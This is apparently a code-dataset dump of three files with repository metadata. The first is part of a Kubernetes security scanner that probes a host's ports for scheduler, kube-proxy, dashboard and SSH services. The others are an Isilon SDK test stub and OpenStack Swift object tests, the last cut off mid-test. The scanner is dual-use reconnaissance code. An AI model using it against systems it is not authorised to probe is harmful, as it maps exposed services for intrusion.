end_point = host + ':' + str(port)
self.service_discovery_status.append('Kube proxy Healthcheck')
break
self.result.update({'kubeproxy_healthcheck': {'active': kubeproxy_healthcheck, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for Kube Scheduler Service...................................')
def scheduler(self, host):
print(" [+] Scanning for Kube Scheduler Service...................................", file=self.file_obj)
scheduler = False
end_point = None
ports = [10251, 10259]
for port in ports:
p_res = self.port_scan(host, port)
if p_res:
scheduler = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('Kube Scheduler Service')
break
self.result.update({'scheduler': {'active': scheduler, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for Kube proxy ..............................................')
def kubeproxy(self, host):
print(" [+] Scanning for Kube proxy ..............................................", file=self.file_obj)
kubeproxy = False
end_point = None
port = 8001
p_res = self.port_scan(host, port)
if p_res:
kubeproxy = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('Kube proxy')
self.result.update({'kubeproxy': {'active': kubeproxy, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for known Open Ports.........................................')
def important_ports(self, host):
print(" [+] Scanning for known Open Ports.........................................", file=self.file_obj)
important_ports = False
end_point = None
port = 22
p_res = self.port_scan(host, port)
if p_res:
important_ports = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('Open Port 22')
self.result.update({'important_ports': {'active': important_ports, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for Kubernetes Dashboard.....................................')
def dashboard(self, host):
print(" [+] Scanning for Kubernetes Dashboard.....................................", file=self.file_obj)
dashboard = False
end_point = None
port = 3000
p_res = self.port_scan(host, port)
if p_res:
dashboard = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('Kubernetes Dashboard')
self.result.update({'dashboard': {'active': dashboard, 'end_point': end_point}})
| 47.513889
| 129
| 0.535711
|
d3b415c8dba1649d5f6a2b1ac86ee84ad9b47c3c
| 930
|
py
|
Python
|
isi_sdk_8_0_1/test/test_smb_log_level_filters.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 24
|
2018-06-22T14:13:23.000Z
|
2022-03-23T01:21:26.000Z
|
isi_sdk_8_0_1/test/test_smb_log_level_filters.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 46
|
2018-04-30T13:28:22.000Z
|
2022-03-21T21:11:07.000Z
|
isi_sdk_8_0_1/test/test_smb_log_level_filters.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 29
|
2018-06-19T00:14:04.000Z
|
2022-02-08T17:51:19.000Z
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 4
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_0_1
from isi_sdk_8_0_1.models.smb_log_level_filters import SmbLogLevelFilters # noqa: E501
from isi_sdk_8_0_1.rest import ApiException
class TestSmbLogLevelFilters(unittest.TestCase):
"""SmbLogLevelFilters unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testSmbLogLevelFilters(self):
"""Test SmbLogLevelFilters"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_8_0_1.models.smb_log_level_filters.SmbLogLevelFilters() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 22.682927
| 95
| 0.713978
|
796846d565a0f7c7da3a08ddc8c88b9ba2522c75
| 62,147
|
py
|
Python
|
test/functional/test_object.py
|
smerritt/swift
|
c4751d0d551ad193a205c71821f6770a31146421
|
[
"Apache-2.0"
] | null | null | null |
test/functional/test_object.py
|
smerritt/swift
|
c4751d0d551ad193a205c71821f6770a31146421
|
[
"Apache-2.0"
] | 12
|
2015-06-23T23:20:17.000Z
|
2016-01-27T00:37:12.000Z
|
test/functional/test_object.py
|
smerritt/swift
|
c4751d0d551ad193a205c71821f6770a31146421
|
[
"Apache-2.0"
] | 5
|
2015-06-04T19:00:11.000Z
|
2015-12-16T21:04:33.000Z
|
#!/usr/bin/python
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import json
import unittest2
from uuid import uuid4
import time
from six.moves import range
from test.functional import check_response, retry, requires_acls, \
requires_policies, SkipTest
import test.functional as tf
def setUpModule():
tf.setup_package()
def tearDownModule():
tf.teardown_package()
class TestObject(unittest2.TestCase):
def setUp(self):
if tf.skip or tf.skip2:
raise SkipTest
if tf.in_process:
tf.skip_if_no_xattrs()
self.container = uuid4().hex
self.containers = []
self._create_container(self.container)
self._create_container(self.container, use_account=2)
self.obj = uuid4().hex
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (
parsed.path, self.container, self.obj), 'test',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
def _create_container(self, name=None, headers=None, use_account=1):
if not name:
name = uuid4().hex
self.containers.append(name)
headers = headers or {}
def put(url, token, parsed, conn, name):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('PUT', parsed.path + '/' + name, '',
new_headers)
return check_response(conn)
resp = retry(put, name, use_account=use_account)
resp.read()
self.assertEqual(resp.status, 201)
# With keystoneauth we need the accounts to have had the project
# domain id persisted as sysmeta prior to testing ACLs. This may
# not be the case if, for example, the account was created using
# a request with reseller_admin role, when project domain id may
# not have been known. So we ensure that the project domain id is
# in sysmeta by making a POST to the accounts using an admin role.
def post(url, token, parsed, conn):
conn.request('POST', parsed.path, '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(post, use_account=use_account)
resp.read()
self.assertEqual(resp.status, 204)
return name
def tearDown(self):
if tf.skip:
raise SkipTest
# get list of objects in container
def get(url, token, parsed, conn, container):
conn.request(
'GET', parsed.path + '/' + container + '?format=json', '',
{'X-Auth-Token': token})
return check_response(conn)
# delete an object
def delete(url, token, parsed, conn, container, obj):
conn.request(
'DELETE', '/'.join([parsed.path, container, obj['name']]), '',
{'X-Auth-Token': token})
return check_response(conn)
for container in self.containers:
while True:
resp = retry(get, container)
body = resp.read()
if resp.status == 404:
break
self.assertEqual(resp.status // 100, 2, resp.status)
objs = json.loads(body)
if not objs:
break
for obj in objs:
resp = retry(delete, container, obj)
resp.read()
self.assertIn(resp.status, (204, 404))
# delete the container
def delete(url, token, parsed, conn, name):
conn.request('DELETE', parsed.path + '/' + name, '',
{'X-Auth-Token': token})
return check_response(conn)
for container in self.containers:
resp = retry(delete, container)
resp.read()
self.assertIn(resp.status, (204, 404))
def test_metadata(self):
obj = 'test_metadata'
req_metadata = {}
def put(url, token, parsed, conn):
headers = {'X-Auth-Token': token}
headers.update(req_metadata)
conn.request('PUT', '%s/%s/%s' % (
parsed.path, self.container, obj
), '', headers)
return check_response(conn)
def get(url, token, parsed, conn):
conn.request(
'GET',
'%s/%s/%s' % (parsed.path, self.container, obj),
'',
{'X-Auth-Token': token})
return check_response(conn)
def post(url, token, parsed, conn):
headers = {'X-Auth-Token': token}
headers.update(req_metadata)
conn.request('POST', '%s/%s/%s' % (
parsed.path, self.container, obj
), '', headers)
return check_response(conn)
def metadata(resp):
metadata = {}
for k, v in resp.headers.items():
if 'meta' in k.lower():
metadata[k] = v
return metadata
# empty put
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(get)
self.assertEqual('', resp.read())
self.assertEqual(resp.status, 200)
self.assertEqual(metadata(resp), {})
# empty post
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 202)
resp = retry(get)
self.assertEqual('', resp.read())
self.assertEqual(resp.status, 200)
self.assertEqual(metadata(resp), {})
# metadata put
req_metadata = {
'x-object-meta-Color': 'blUe',
'X-Object-Meta-food': 'PizZa',
}
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(get)
self.assertEqual('', resp.read())
self.assertEqual(resp.status, 200)
self.assertEqual(metadata(resp), {
'X-Object-Meta-Color': 'blUe',
'X-Object-Meta-Food': 'PizZa',
})
# metadata post
req_metadata = {'X-Object-Meta-color': 'oraNge'}
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 202)
resp = retry(get)
self.assertEqual('', resp.read())
self.assertEqual(resp.status, 200)
self.assertEqual(metadata(resp), {
'X-Object-Meta-Color': 'oraNge'
})
# sysmeta put
req_metadata = {
'X-Object-Meta-Color': 'Red',
'X-Object-Sysmeta-Color': 'Green',
'X-Object-Transient-Sysmeta-Color': 'Blue',
}
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(get)
self.assertEqual('', resp.read())
self.assertEqual(resp.status, 200)
self.assertEqual(metadata(resp), {
'X-Object-Meta-Color': 'Red',
})
# sysmeta post
req_metadata = {
'X-Object-Meta-Food': 'Burger',
'X-Object-Meta-Animal': 'Cat',
'X-Object-Sysmeta-Animal': 'Cow',
'X-Object-Transient-Sysmeta-Food': 'Burger',
}
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 202)
resp = retry(get)
self.assertEqual('', resp.read())
self.assertEqual(resp.status, 200)
self.assertEqual(metadata(resp), {
'X-Object-Meta-Food': 'Burger',
'X-Object-Meta-Animal': 'Cat',
})
# non-ascii put
req_metadata = {
'X-Object-Meta-Foo': u'B\u00e2r',
}
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(get)
self.assertEqual('', resp.read())
self.assertEqual(resp.status, 200)
self.assertEqual(metadata(resp), {
'X-Object-Meta-Foo': 'B\xc3\xa2r',
})
# non-ascii post
req_metadata = {
'X-Object-Meta-Foo': u'B\u00e5z',
}
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 202)
resp = retry(get)
self.assertEqual('', resp.read())
self.assertEqual(resp.status, 200)
self.assertEqual(metadata(resp), {
'X-Object-Meta-Foo': 'B\xc3\xa5z',
})
def test_if_none_match(self):
def delete(url, token, parsed, conn):
conn.request('DELETE', '%s/%s/%s' % (
parsed.path, self.container, 'if_none_match_test'), '',
{'X-Auth-Token': token})
return check_response(conn)
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (
parsed.path, self.container, 'if_none_match_test'), '',
{'X-Auth-Token': token,
'Content-Length': '0',
'If-None-Match': '*'})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 412)
resp = retry(delete)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (
parsed.path, self.container, 'if_none_match_test'), '',
{'X-Auth-Token': token,
'Content-Length': '0',
'If-None-Match': 'somethingelse'})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 400)
def test_too_small_x_timestamp(self):
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (parsed.path, self.container,
'too_small_x_timestamp'),
'', {'X-Auth-Token': token,
'Content-Length': '0',
'X-Timestamp': '-1'})
return check_response(conn)
def head(url, token, parsed, conn):
conn.request('HEAD', '%s/%s/%s' % (parsed.path, self.container,
'too_small_x_timestamp'),
'', {'X-Auth-Token': token,
'Content-Length': '0'})
return check_response(conn)
ts_before = time.time()
time.sleep(0.05)
resp = retry(put)
body = resp.read()
time.sleep(0.05)
ts_after = time.time()
if resp.status == 400:
# shunt_inbound_x_timestamp must be false
self.assertIn(
'X-Timestamp should be a UNIX timestamp float value', body)
else:
self.assertEqual(resp.status, 201)
self.assertEqual(body, '')
resp = retry(head)
resp.read()
self.assertGreater(float(resp.headers['x-timestamp']), ts_before)
self.assertLess(float(resp.headers['x-timestamp']), ts_after)
def test_too_big_x_timestamp(self):
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (parsed.path, self.container,
'too_big_x_timestamp'),
'', {'X-Auth-Token': token,
'Content-Length': '0',
'X-Timestamp': '99999999999.9999999999'})
return check_response(conn)
def head(url, token, parsed, conn):
conn.request('HEAD', '%s/%s/%s' % (parsed.path, self.container,
'too_big_x_timestamp'),
'', {'X-Auth-Token': token,
'Content-Length': '0'})
return check_response(conn)
ts_before = time.time()
time.sleep(0.05)
resp = retry(put)
body = resp.read()
time.sleep(0.05)
ts_after = time.time()
if resp.status == 400:
# shunt_inbound_x_timestamp must be false
self.assertIn(
'X-Timestamp should be a UNIX timestamp float value', body)
else:
self.assertEqual(resp.status, 201)
self.assertEqual(body, '')
resp = retry(head)
resp.read()
self.assertGreater(float(resp.headers['x-timestamp']), ts_before)
self.assertLess(float(resp.headers['x-timestamp']), ts_after)
def test_x_delete_after(self):
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (parsed.path, self.container,
'x_delete_after'),
'', {'X-Auth-Token': token,
'Content-Length': '0',
'X-Delete-After': '2'})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
def get(url, token, parsed, conn):
conn.request(
'GET',
'%s/%s/%s' % (parsed.path, self.container, 'x_delete_after'),
'',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(get)
resp.read()
count = 0
while resp.status == 200 and count < 10:
resp = retry(get)
resp.read()
count += 1
time.sleep(0.5)
self.assertEqual(resp.status, 404)
        # Re-create the object so that its deletion in tearDown() does not fail.
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
def test_x_delete_at(self):
def put(url, token, parsed, conn):
dt = datetime.datetime.now()
epoch = time.mktime(dt.timetuple())
delete_time = str(int(epoch) + 3)
conn.request(
'PUT',
'%s/%s/%s' % (parsed.path, self.container, 'x_delete_at'),
'',
{'X-Auth-Token': token,
'Content-Length': '0',
'X-Delete-At': delete_time})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
def get(url, token, parsed, conn):
conn.request(
'GET',
'%s/%s/%s' % (parsed.path, self.container, 'x_delete_at'),
'',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(get)
resp.read()
count = 0
while resp.status == 200 and count < 10:
resp = retry(get)
resp.read()
count += 1
time.sleep(1)
self.assertEqual(resp.status, 404)
        # Re-create the object so that its deletion in tearDown() does not fail.
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
def test_non_integer_x_delete_after(self):
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (parsed.path, self.container,
'non_integer_x_delete_after'),
'', {'X-Auth-Token': token,
'Content-Length': '0',
'X-Delete-After': '*'})
return check_response(conn)
resp = retry(put)
body = resp.read()
self.assertEqual(resp.status, 400)
self.assertEqual(body, 'Non-integer X-Delete-After')
def test_non_integer_x_delete_at(self):
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (parsed.path, self.container,
'non_integer_x_delete_at'),
'', {'X-Auth-Token': token,
'Content-Length': '0',
'X-Delete-At': '*'})
return check_response(conn)
resp = retry(put)
body = resp.read()
self.assertEqual(resp.status, 400)
self.assertEqual(body, 'Non-integer X-Delete-At')
def test_x_delete_at_in_the_past(self):
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (parsed.path, self.container,
'x_delete_at_in_the_past'),
'', {'X-Auth-Token': token,
'Content-Length': '0',
'X-Delete-At': '0'})
return check_response(conn)
resp = retry(put)
body = resp.read()
self.assertEqual(resp.status, 400)
self.assertEqual(body, 'X-Delete-At in past')
def test_copy_object(self):
if tf.skip:
raise SkipTest
source = '%s/%s' % (self.container, self.obj)
dest = '%s/%s' % (self.container, 'test_copy')
# get contents of source
def get_source(url, token, parsed, conn):
conn.request('GET',
'%s/%s' % (parsed.path, source),
'', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get_source)
source_contents = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(source_contents, 'test')
# copy source to dest with X-Copy-From
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s' % (parsed.path, dest), '',
{'X-Auth-Token': token,
'Content-Length': '0',
'X-Copy-From': source})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
# contents of dest should be the same as source
def get_dest(url, token, parsed, conn):
conn.request('GET',
'%s/%s' % (parsed.path, dest),
'', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get_dest)
dest_contents = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(dest_contents, source_contents)
# delete the copy
def delete(url, token, parsed, conn):
conn.request('DELETE', '%s/%s' % (parsed.path, dest), '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete)
resp.read()
self.assertIn(resp.status, (204, 404))
# verify dest does not exist
resp = retry(get_dest)
resp.read()
self.assertEqual(resp.status, 404)
# copy source to dest with COPY
def copy(url, token, parsed, conn):
conn.request('COPY', '%s/%s' % (parsed.path, source), '',
{'X-Auth-Token': token,
'Destination': dest})
return check_response(conn)
resp = retry(copy)
resp.read()
self.assertEqual(resp.status, 201)
# contents of dest should be the same as source
resp = retry(get_dest)
dest_contents = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(dest_contents, source_contents)
# copy source to dest with COPY and range
def copy(url, token, parsed, conn):
conn.request('COPY', '%s/%s' % (parsed.path, source), '',
{'X-Auth-Token': token,
'Destination': dest,
'Range': 'bytes=1-2'})
return check_response(conn)
resp = retry(copy)
resp.read()
self.assertEqual(resp.status, 201)
# contents of dest should be the same as source
resp = retry(get_dest)
dest_contents = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(dest_contents, source_contents[1:3])
# delete the copy
resp = retry(delete)
resp.read()
self.assertIn(resp.status, (204, 404))
def test_copy_between_accounts(self):
if tf.skip2:
raise SkipTest
source = '%s/%s' % (self.container, self.obj)
dest = '%s/%s' % (self.container, 'test_copy')
# get contents of source
def get_source(url, token, parsed, conn):
conn.request('GET',
'%s/%s' % (parsed.path, source),
'', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get_source)
source_contents = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(source_contents, 'test')
acct = tf.parsed[0].path.split('/', 2)[2]
# copy source to dest with X-Copy-From-Account
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s' % (parsed.path, dest), '',
{'X-Auth-Token': token,
'Content-Length': '0',
'X-Copy-From-Account': acct,
'X-Copy-From': source})
return check_response(conn)
# try to put, will not succeed
# user does not have permissions to read from source
resp = retry(put, use_account=2)
self.assertEqual(resp.status, 403)
# add acl to allow reading from source
def post(url, token, parsed, conn):
conn.request('POST', '%s/%s' % (parsed.path, self.container), '',
{'X-Auth-Token': token,
'X-Container-Read': tf.swift_test_perm[1]})
return check_response(conn)
resp = retry(post)
self.assertEqual(resp.status, 204)
# retry previous put, now should succeed
resp = retry(put, use_account=2)
self.assertEqual(resp.status, 201)
# contents of dest should be the same as source
def get_dest(url, token, parsed, conn):
conn.request('GET',
'%s/%s' % (parsed.path, dest),
'', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get_dest, use_account=2)
dest_contents = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(dest_contents, source_contents)
# delete the copy
def delete(url, token, parsed, conn):
conn.request('DELETE', '%s/%s' % (parsed.path, dest), '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete, use_account=2)
resp.read()
self.assertIn(resp.status, (204, 404))
# verify dest does not exist
resp = retry(get_dest, use_account=2)
resp.read()
self.assertEqual(resp.status, 404)
acct_dest = tf.parsed[1].path.split('/', 2)[2]
# copy source to dest with COPY
def copy(url, token, parsed, conn):
conn.request('COPY', '%s/%s' % (parsed.path, source), '',
{'X-Auth-Token': token,
'Destination-Account': acct_dest,
'Destination': dest})
return check_response(conn)
# try to copy, will not succeed
# user does not have permissions to write to destination
resp = retry(copy)
resp.read()
self.assertEqual(resp.status, 403)
# add acl to allow write to destination
def post(url, token, parsed, conn):
conn.request('POST', '%s/%s' % (parsed.path, self.container), '',
{'X-Auth-Token': token,
'X-Container-Write': tf.swift_test_perm[0]})
return check_response(conn)
resp = retry(post, use_account=2)
self.assertEqual(resp.status, 204)
# now copy will succeed
resp = retry(copy)
resp.read()
self.assertEqual(resp.status, 201)
# contents of dest should be the same as source
resp = retry(get_dest, use_account=2)
dest_contents = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(dest_contents, source_contents)
# delete the copy
resp = retry(delete, use_account=2)
resp.read()
self.assertIn(resp.status, (204, 404))
def test_public_object(self):
if tf.skip:
raise SkipTest
def get(url, token, parsed, conn):
conn.request('GET',
'%s/%s/%s' % (parsed.path, self.container, self.obj))
return check_response(conn)
try:
resp = retry(get)
raise Exception('Should not have been able to GET')
except Exception as err:
self.assertTrue(str(err).startswith('No result after '))
def post(url, token, parsed, conn):
conn.request('POST', parsed.path + '/' + self.container, '',
{'X-Auth-Token': token,
'X-Container-Read': '.r:*'})
return check_response(conn)
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(get)
resp.read()
self.assertEqual(resp.status, 200)
def post(url, token, parsed, conn):
conn.request('POST', parsed.path + '/' + self.container, '',
{'X-Auth-Token': token, 'X-Container-Read': ''})
return check_response(conn)
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 204)
try:
resp = retry(get)
raise Exception('Should not have been able to GET')
except Exception as err:
self.assertTrue(str(err).startswith('No result after '))
def test_private_object(self):
if tf.skip or tf.skip3:
raise SkipTest
# Ensure we can't access the object with the third account
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/%s' % (
parsed.path, self.container, self.obj), '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(get, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# create a shared container writable by account3
shared_container = uuid4().hex
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s' % (
parsed.path, shared_container), '',
{'X-Auth-Token': token,
'X-Container-Read': tf.swift_test_perm[2],
'X-Container-Write': tf.swift_test_perm[2]})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
# verify third account can not copy from private container
def copy(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (
parsed.path, shared_container, 'private_object'), '',
{'X-Auth-Token': token,
'Content-Length': '0',
'X-Copy-From': '%s/%s' % (self.container, self.obj)})
return check_response(conn)
resp = retry(copy, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# verify third account can write "obj1" to shared container
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (
parsed.path, shared_container, 'obj1'), 'test',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(put, use_account=3)
resp.read()
self.assertEqual(resp.status, 201)
# verify third account can copy "obj1" to shared container
def copy2(url, token, parsed, conn):
conn.request('COPY', '%s/%s/%s' % (
parsed.path, shared_container, 'obj1'), '',
{'X-Auth-Token': token,
'Destination': '%s/%s' % (shared_container, 'obj1')})
return check_response(conn)
resp = retry(copy2, use_account=3)
resp.read()
self.assertEqual(resp.status, 201)
# verify third account STILL can not copy from private container
def copy3(url, token, parsed, conn):
conn.request('COPY', '%s/%s/%s' % (
parsed.path, self.container, self.obj), '',
{'X-Auth-Token': token,
'Destination': '%s/%s' % (shared_container,
'private_object')})
return check_response(conn)
resp = retry(copy3, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# clean up "obj1"
def delete(url, token, parsed, conn):
conn.request('DELETE', '%s/%s/%s' % (
parsed.path, shared_container, 'obj1'), '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete)
resp.read()
self.assertIn(resp.status, (204, 404))
# clean up shared_container
def delete(url, token, parsed, conn):
conn.request('DELETE',
parsed.path + '/' + shared_container, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete)
resp.read()
self.assertIn(resp.status, (204, 404))
def test_container_write_only(self):
if tf.skip or tf.skip3:
raise SkipTest
# Ensure we can't access the object with the third account
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/%s' % (
parsed.path, self.container, self.obj), '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(get, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# create a shared container writable (but not readable) by account3
shared_container = uuid4().hex
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s' % (
parsed.path, shared_container), '',
{'X-Auth-Token': token,
'X-Container-Write': tf.swift_test_perm[2]})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
# verify third account can write "obj1" to shared container
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (
parsed.path, shared_container, 'obj1'), 'test',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(put, use_account=3)
resp.read()
self.assertEqual(resp.status, 201)
# verify third account cannot copy "obj1" to shared container
def copy(url, token, parsed, conn):
conn.request('COPY', '%s/%s/%s' % (
parsed.path, shared_container, 'obj1'), '',
{'X-Auth-Token': token,
'Destination': '%s/%s' % (shared_container, 'obj2')})
return check_response(conn)
resp = retry(copy, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# verify third account can POST to "obj1" in shared container
def post(url, token, parsed, conn):
conn.request('POST', '%s/%s/%s' % (
parsed.path, shared_container, 'obj1'), '',
{'X-Auth-Token': token,
'X-Object-Meta-Color': 'blue'})
return check_response(conn)
resp = retry(post, use_account=3)
resp.read()
self.assertEqual(resp.status, 202)
# verify third account can DELETE from shared container
def delete(url, token, parsed, conn):
conn.request('DELETE', '%s/%s/%s' % (
parsed.path, shared_container, 'obj1'), '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete, use_account=3)
resp.read()
self.assertIn(resp.status, (204, 404))
# clean up shared_container
def delete(url, token, parsed, conn):
conn.request('DELETE',
parsed.path + '/' + shared_container, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete)
resp.read()
self.assertIn(resp.status, (204, 404))
@requires_acls
def test_read_only(self):
if tf.skip3:
raise tf.SkipTest
def get_listing(url, token, parsed, conn):
conn.request('GET', '%s/%s' % (parsed.path, self.container), '',
{'X-Auth-Token': token})
return check_response(conn)
def post_account(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path, '', new_headers)
return check_response(conn)
def get(url, token, parsed, conn, name):
conn.request('GET', '%s/%s/%s' % (
parsed.path, self.container, name), '',
{'X-Auth-Token': token})
return check_response(conn)
def put(url, token, parsed, conn, name):
conn.request('PUT', '%s/%s/%s' % (
parsed.path, self.container, name), 'test',
{'X-Auth-Token': token})
return check_response(conn)
def delete(url, token, parsed, conn, name):
            conn.request('DELETE', '%s/%s/%s' % (
parsed.path, self.container, name), '',
{'X-Auth-Token': token})
return check_response(conn)
# cannot list objects
resp = retry(get_listing, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# cannot get object
resp = retry(get, self.obj, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# grant read-only access
acl_user = tf.swift_test_user[2]
acl = {'read-only': [acl_user]}
headers = {'x-account-access-control': json.dumps(acl)}
resp = retry(post_account, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
# can list objects
resp = retry(get_listing, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertIn(self.obj, listing)
# can get object
resp = retry(get, self.obj, use_account=3)
body = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(body, 'test')
# can not put an object
obj_name = str(uuid4())
resp = retry(put, obj_name, use_account=3)
body = resp.read()
self.assertEqual(resp.status, 403)
# can not delete an object
resp = retry(delete, self.obj, use_account=3)
body = resp.read()
self.assertEqual(resp.status, 403)
# sanity with account1
resp = retry(get_listing, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertNotIn(obj_name, listing)
self.assertIn(self.obj, listing)
@requires_acls
def test_read_write(self):
if tf.skip3:
raise SkipTest
def get_listing(url, token, parsed, conn):
conn.request('GET', '%s/%s' % (parsed.path, self.container), '',
{'X-Auth-Token': token})
return check_response(conn)
def post_account(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path, '', new_headers)
return check_response(conn)
def get(url, token, parsed, conn, name):
conn.request('GET', '%s/%s/%s' % (
parsed.path, self.container, name), '',
{'X-Auth-Token': token})
return check_response(conn)
def put(url, token, parsed, conn, name):
conn.request('PUT', '%s/%s/%s' % (
parsed.path, self.container, name), 'test',
{'X-Auth-Token': token})
return check_response(conn)
def delete(url, token, parsed, conn, name):
conn.request('DELETE', '%s/%s/%s' % (
parsed.path, self.container, name), '',
{'X-Auth-Token': token})
return check_response(conn)
# cannot list objects
resp = retry(get_listing, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# cannot get object
resp = retry(get, self.obj, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# grant read-write access
acl_user = tf.swift_test_user[2]
acl = {'read-write': [acl_user]}
headers = {'x-account-access-control': json.dumps(acl)}
resp = retry(post_account, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
# can list objects
resp = retry(get_listing, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertIn(self.obj, listing)
# can get object
resp = retry(get, self.obj, use_account=3)
body = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(body, 'test')
# can put an object
obj_name = str(uuid4())
resp = retry(put, obj_name, use_account=3)
body = resp.read()
self.assertEqual(resp.status, 201)
# can delete an object
